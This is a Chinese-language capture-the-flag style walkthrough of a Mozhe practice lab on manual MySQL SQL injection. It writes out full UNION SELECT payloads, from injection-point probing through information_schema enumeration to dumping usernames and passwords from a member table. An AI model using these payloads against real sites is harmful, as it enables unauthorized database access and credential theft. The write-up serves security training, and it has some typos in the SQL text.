墨者靶场 SQL手工注入漏洞测试【MySQL数据库】

墨者靶场 SQL手工注入漏洞测试(MySQL数据库)

1. 首先访问链接：可以看到是要找到登陆的用户和密码
   

2. 找到是否有注入点：124.70.64.48:47756/new_list.php?id=1
   可以看到显示的页面
   3. 124.70.64.48:47756/new_list.php?id=1 and 1=1 页面显示正常
   

3. 124.70.64.48:47756/new_list.php?id=1 and 1=2 页面显示异常 可以判断id是存在注入点的
   

4. 查找数量：124.70.64.48:47756/new_list.php?id=1 order by 204 尝试1234都是正常的，到了5就发现了异常，所以可以确定数量是4

5. 手工注入使用union联合查询：
   124.70.64.48:47756/new_list.php?id=-1 union select 1,2,3,4
   很容易就可以看到页面中的2和3，就可以猜测是这两个地方有注入
   

6. 124.70.64.48:47756/new_list.php?id=-1 union select 1,database(),3,4（将2的地方改成查询数据库试试）发现找到了数据库的名称
   

7. 改3：124.70.64.48:47756/new_list.php?id=-1 union select 1,database(),version(),4
   可以看到数据库的版本号了
   同理查询数据库用户和数据库类型：可以看到是root用户名和Linux系统

利用information_schema数据库查询：几乎包含所有的表名等信息；
information_schema.tables:记录所有表名信息的表
information_schema.conlumus:记录所有列名信息的表

9.查询表名：
124.70.64.48:47756/new_list.php id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
10. 查询表下的列名：124.70.64.48:47756/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=‘StormGroup_member’
11.查询指定数据：
124.70.64.48:47756/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member

124.70.64.48:47756/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member limit 1,1 有两个账号，在最后加limit 0，1 尝试到1，1 2，1最后发现有两个mozhe账号密码
12. 最后成功登录：